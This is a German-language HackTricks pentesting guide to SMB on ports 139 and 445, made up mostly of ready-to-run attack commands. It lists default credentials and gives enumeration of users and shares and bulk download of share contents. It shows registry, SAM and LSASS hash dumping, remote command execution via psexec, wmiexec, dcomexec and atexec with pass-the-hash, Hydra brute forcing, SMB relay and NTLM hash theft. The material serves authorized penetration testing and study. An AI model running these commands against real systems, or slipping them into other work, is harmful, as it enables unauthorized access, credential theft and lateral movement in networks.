139,445 - Pentesting SMB

Reading time: 22 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Port 139

Das Network Basic Input Output System** (NetBIOS)** ist ein Softwareprotokoll, das entwickelt wurde, um Anwendungen, PCs und Desktops innerhalb eines lokalen Netzwerks (LAN) die Interaktion mit Netzwerkhardware zu ermöglichen und die Übertragung von Daten im Netzwerk zu erleichtern. Die Identifizierung und Lokalisierung von Softwareanwendungen, die in einem NetBIOS-Netzwerk betrieben werden, erfolgen über ihre NetBIOS-Namen, die bis zu 16 Zeichen lang sein können und häufig vom Computernamen abweichen. Eine NetBIOS-Sitzung zwischen zwei Anwendungen wird initiiert, wenn eine Anwendung (als Client fungierend) einen Befehl sendet, eine andere Anwendung (als Server fungierend) zu "aufrufen", wobei TCP Port 139 verwendet wird.

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn

Port 445

Technisch wird Port 139 als ‘NBT over IP’ bezeichnet, während Port 445 als ‘SMB over IP’ identifiziert wird. Das Akronym SMB steht für ‘Server Message Blocks’, das heutzutage auch als Common Internet File System (CIFS) bekannt ist. Als anwendungsorientiertes Netzwerkprotokoll wird SMB/CIFS hauptsächlich verwendet, um gemeinsamen Zugriff auf Dateien, Drucker und serielle Schnittstellen zu ermöglichen und verschiedene Formen der Kommunikation zwischen Knoten in einem Netzwerk zu erleichtern.

Beispielsweise wird im Kontext von Windows hervorgehoben, dass SMB direkt über TCP/IP arbeiten kann, wodurch die Notwendigkeit für NetBIOS over TCP/IP entfällt, indem Port 445 verwendet wird. Umgekehrt wird auf anderen Systemen die Verwendung von Port 139 beobachtet, was darauf hinweist, dass SMB zusammen mit NetBIOS over TCP/IP ausgeführt wird.

445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

SMB

Das Server Message Block (SMB)-Protokoll, das in einem Client-Server-Modell arbeitet, ist dazu konzipiert, den Zugriff auf Dateien, Verzeichnisse und andere Netzwerkressourcen wie Drucker und Router zu regeln. Hauptsächlich innerhalb der Windows-Betriebssystemreihe verwendet, stellt SMB Abwärtskompatibilität sicher, sodass Geräte mit neueren Versionen von Microsofts Betriebssystem nahtlos mit solchen mit älteren Versionen interagieren können. Zusätzlich bietet das Samba-Projekt eine freie Softwarelösung, die die Implementierung von SMB auf Linux- und Unix-Systemen ermöglicht und so plattformübergreifende Kommunikation über SMB erleichtert.

Shares, die beliebige Teile des lokalen Dateisystems darstellen, können von einem SMB-Server bereitgestellt werden, wodurch die Hierarchie für einen Client teilweise unabhängig von der tatsächlichen Struktur des Servers sichtbar wird. Die Access Control Lists (ACLs), die die Zugriffsrechte definieren, erlauben eine feingranulare Kontrolle über Benutzerberechtigungen, einschließlich Attributen wie execute, read und full access. Diese Berechtigungen können abhängig von den Shares einzelnen Benutzern oder Gruppen zugewiesen werden und unterscheiden sich von den lokal auf dem Server gesetzten Berechtigungen.

IPC$ Share

Der Zugriff auf die IPC$-Share kann über eine anonyme null session erlangt werden und erlaubt die Interaktion mit Diensten, die über named pipes angeboten werden. Das Tool enum4linux ist hierfür nützlich. Richtig eingesetzt ermöglicht es die Beschaffung von:

  • Informationen zum Betriebssystem
  • Angaben zur übergeordneten Domain
  • Eine Aufstellung lokaler Benutzer und Gruppen
  • Informationen zu verfügbaren SMB-Shares
  • Der wirksamen System-Sicherheitsrichtlinie

Diese Funktionalität ist für Netzwerkadministratoren und Sicherheitsfachleute entscheidend, um die Sicherheitslage von SMB (Server Message Block)-Diensten in einem Netzwerk zu beurteilen. enum4linux liefert eine umfassende Sicht auf die SMB-Umgebung des Zielsystems, die wesentlich ist, um potenzielle Schwachstellen zu identifizieren und sicherzustellen, dass die SMB-Dienste ordnungsgemäß abgesichert sind.

bash
enum4linux -a target_ip

Der obige Befehl ist ein Beispiel dafür, wie enum4linux verwendet werden könnte, um eine vollständige enumeration gegen ein Ziel durchzuführen, das durch target_ip angegeben ist.

Was ist NTLM

Wenn du nicht weißt, was NTLM ist oder wissen möchtest, wie es funktioniert und wie man es missbrauchen kann, findest du diese Seite über NTLM sehr interessant, auf der erklärt wird, wie dieses Protokoll funktioniert und wie du es ausnutzen kannst:

NTLM

Server Enumeration

Scan ein Netzwerk, um nach Hosts zu suchen:

bash
nbtscan -r 192.168.0.1/24

SMB-Server-Version

Um nach möglichen Exploits für die SMB-Version zu suchen, ist es wichtig zu wissen, welche Version verwendet wird. Wenn diese Information in den anderen verwendeten Tools nicht erscheint, können Sie:

  • Verwenden Sie das MSF auxiliary module **auxiliary/scanner/smb/smb_version**
  • Oder dieses Skript:
bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1

Exploit suchen

bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb

Mögliche Anmeldeinformationen

Benutzername(n)Häufige Passwörter
(leer)(leer)
guest(leer)
Administrator, admin(leer), password, administrator, admin
arcservearcserve, backup
tivoli, tmersrvdtivoli, tmersrvd, admin
backupexec, backupbackupexec, backup, arcada
test, lab, demopassword, test, lab, demo

Brute Force

Informationen zur SMB-Umgebung

Informationen beschaffen

bash
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

Benutzer, Gruppen & angemeldete Benutzer auflisten

Diese Informationen sollten bereits durch enum4linux und enum4linux-ng gesammelt worden sein.

bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups

Lokale Benutzer auflisten

Impacket

bash
lookupsid.py -no-pass hostname.local

Einzeiler

bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Metasploit - Lokale Benutzer auflisten

bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run

Aufzählung von LSARPC und SAMR rpcclient

rpcclient enumeration

GUI-Verbindung unter Linux

Im Terminal:

xdg-open smb://cascade.htb/

Im Dateimanager-Fenster (nautilus, thunar, usw.)

smb://friendzone.htb/general/

Aufzählung freigegebener Ordner

Freigegebene Ordner auflisten

Es wird immer empfohlen zu prüfen, ob Sie auf irgendetwas zugreifen können. Wenn Sie keine Anmeldeinformationen haben, versuchen Sie die Verwendung von null credentials/guest user.

bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list

crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user

Verbinden/Auflisten eines freigegebenen Ordners

bash
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls'  to list recursively with smbclient

#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash

Manuell Windows-Shares auflisten und verbinden

Es kann sein, dass du daran gehindert wirst, die Shares des Host-Rechners anzuzeigen; beim Versuch, sie aufzulisten, sieht es so aus, als gäbe es keine Shares, zu denen du dich verbinden könntest. Deshalb lohnt es sich, kurz zu versuchen, manuell eine Verbindung zu einem Share herzustellen. Um die Shares manuell zu enumerieren, solltest du auf Antworten wie NT_STATUS_ACCESS_DENIED und NT_STATUS_BAD_NETWORK_NAME achten, wenn du eine gültige Sitzung verwendest (z. B. null session oder gültige Anmeldedaten). Diese können darauf hinweisen, ob das Share existiert und du keinen Zugriff darauf hast oder das Share überhaupt nicht existiert.

Häufige Share-Namen für Windows-Ziele sind

  • C$
  • D$
  • ADMIN$
  • IPC$
  • PRINT$
  • FAX$
  • SYSVOL
  • NETLOGON

(Übliche Share-Namen aus Network Security Assessment 3rd edition)

Du kannst versuchen, dich mit ihnen zu verbinden, indem du folgenden Befehl verwendest

bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)

oder dieses script (mit einer null session)

bash
#/bin/bash

ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')

for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')

if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done

Beispiele

bash
smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session

Freigaben unter Windows auflisten / ohne Drittanbieter-Tools

PowerShell

bash
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection

CMD-Konsole

shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all

MMC Snap-in (grafisch)

shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc

explorer.exe (grafisch): \\<ip>\ eingeben, um die verfügbaren nicht versteckten Freigaben zu sehen.

Ein freigegebenes Verzeichnis einbinden

bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

Dateien herunterladen

Lesen Sie die vorherigen Abschnitte, um zu lernen, wie man sich mit credentials/Pass-the-Hash verbindet.

bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
bash
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory

Befehle:

  • mask: spezifiziert die Maske, die verwendet wird, um Dateien im Verzeichnis zu filtern (z. B. "" für alle Dateien)
  • recurse: schaltet Rekursion ein (Standard: aus)
  • prompt: schaltet die Abfrage nach Dateinamen aus (Standard: ein)
  • mget: kopiert alle Dateien, die der Maske entsprechen, vom Host auf die Client-Maschine

(Informationen aus der manpage von smbclient)

Suche nach freigegebenen Ordnern in der Domain

bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
  • CrackMapExec spider.
  • -M spider_plus [--share <share_name>]
  • --pattern txt
bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'

Besonders interessant von Shares sind die Dateien namens Registry.xml, da sie may contain passwords für Benutzer enthalten können, die mit autologon via Group Policy konfiguriert wurden. Oder web.config-Dateien, da sie credentials enthalten.

tip

Der SYSVOL share ist für alle authentifizierten Benutzer in der Domain lesbar. Dort können Sie viele verschiedene batch-, VBScript- und PowerShell-Skripte finden.
Sie sollten die Skripte darin überprüfen, da Sie möglicherweise sensible Informationen wie passwords finden.

Registry auslesen

Sie können möglicherweise die Registry auslesen, indem Sie einige entdeckte credentials verwenden. Impacket reg.py ermöglicht es Ihnen, dies zu versuchen:

bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s

Post-Exploitation

Die Standardkonfiguration eines Samba-Servers befindet sich normalerweise in /etc/samba/smb.conf und kann einige gefährliche Konfigurationen enthalten:

SettingBeschreibung
browseable = yesErlaubt das Auflisten verfügbarer Freigaben im aktuellen Share?
read only = noVerhindert die Erstellung und Änderung von Dateien?
writable = yesErmöglicht Benutzern das Erstellen und Ändern von Dateien?
guest ok = yesErmöglicht die Verbindung zum Dienst ohne Verwendung eines Passworts?
enable privileges = yesBeachtet Berechtigungen, die bestimmten SIDs zugewiesen sind?
create mask = 0777Welche Berechtigungen müssen neu erstellten Dateien zugewiesen werden?
directory mask = 0777Welche Berechtigungen müssen neu erstellten Verzeichnissen zugewiesen werden?
logon script = script.shWelches Skript muss beim Login des Benutzers ausgeführt werden?
magic script = script.shWelches Skript sollte ausgeführt werden, wenn das Skript geschlossen wird?
magic output = script.outWo die Ausgabe des magic script gespeichert werden muss?

Der Befehl smbstatus liefert Informationen über den Server und darüber, wer verbunden ist.

Authentifizierung mit Kerberos

Sie können sich gegenüber Kerberos mit den Tools smbclient und rpcclient authentifizieren:

bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com

In Kerberos-only-Umgebungen (NTLM deaktiviert) können NTLM-Versuche gegen SMB STATUS_NOT_SUPPORTED zurückgeben. Behebe häufige Kerberos-Probleme und erzwinge Kerberos-Authentifizierung:

bash
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>

# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k

Für eine vollständige Client-Einrichtung (krb5.conf-Generierung, kinit, SSH GSSAPI/SPN-Hinweise) siehe:

88tcp/udp - Pentesting Kerberos

Befehle ausführen

crackmapexec

crackmapexec kann Befehle ausführen, indem es eines der mmcexec, smbexec, atexec, wmiexec ausnutzt, wobei wmiexec die Standardmethode ist. Welche Option verwendet werden soll, geben Sie mit dem Parameter --exec-method an:

bash
apt-get install crackmapexec

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash

psexec/smbexec

Beide Optionen werden einen neuen Dienst erstellen (mithilfe von \pipe\svcctl über SMB) auf dem Zielrechner und ihn verwenden, um etwas auszuführen (psexec wird eine ausführbare Datei auf das ADMIN$ share upload und smbexec wird auf cmd.exe/powershell.exe verweisen und in die Argumente das payload setzen --file-less technique--).
Mehr Infos über psexec und smbexec.
In kali befindet es sich unter /usr/share/doc/python3-impacket/examples/

bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash

Mit dem Parameter -k kannst du dich gegen kerberos statt NTLM authentifizieren.

wmiexec/dcomexec

Führe heimlich eine Kommando-Shell aus, ohne die Festplatte zu berühren oder einen neuen Service zu starten, indem du DCOM über Port 135.
In kali befindet es sich in /usr/share/doc/python3-impacket/examples/

bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted

Mit dem Parameter -k kannst du dich gegen kerberos statt NTLM authentifizieren.

bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted

AtExec

Befehle über den Task Scheduler ausführen (mithilfe von \pipe\atsvc über SMB).
Unter kali befindet es sich in /usr/share/doc/python3-impacket/examples/

bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"

Impacket Referenz

https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/

ksmbd Angriffsfläche und SMB2/SMB3 protocol fuzzing (syzkaller)

Ksmbd Attack Surface And Fuzzing Syzkaller

Bruteforce Benutzer credentials

Dies wird nicht empfohlen — ein Konto könnte gesperrt werden, wenn die maximal erlaubten Versuche überschritten werden.

bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name

SMB relay attack

Dieser Angriff verwendet das Responder toolkit, um capture SMB authentication sessions in einem internen Netzwerk abzufangen und relays sie an eine target machine. Wenn die Authentifizierung session is successful, wird automatisch eine system shell geöffnet.
More information about this attack here.

SMB-Trap

Die Windows-Bibliothek URLMon.dll versucht automatisch, sich beim Host zu authentifizieren, wenn eine Seite versucht, Inhalte über SMB zu laden, zum Beispiel: img src="\\10.10.10.10\path\image.jpg"

Dies geschieht bei den folgenden Funktionen:

  • URLDownloadToFile
  • URLDownloadToCache
  • URLOpenStream
  • URLOpenBlockingStream

Die von einigen Browsern und Tools (wie Skype) verwendet werden.

From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html

SMBTrap using MitMf

From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html

NTLM Theft

Ähnlich wie beim SMB Trapping kann das Ablegen bösartiger Dateien auf einem Zielsystem (z. B. über SMB) eine SMB-Authentifizierungsanfrage auslösen, wodurch der NetNTLMv2-Hash mit einem Tool wie Responder abgefangen werden kann. Der Hash kann anschließend offline geknackt oder in einem SMB relay attack verwendet werden.

See: ntlm_theft

HackTricks Automatische Befehle

Protocol_Name: SMB    #Protocol Abbreviation if there is one.
Port_Number:  137,138,139     #Comma separated if there is more than one.
Protocol_Description: Server Message Block         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.

#These are the commands I run in order every time I see an open SMB port

With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}

With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html

Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}

Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}

Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445  enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'

Referenzen

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks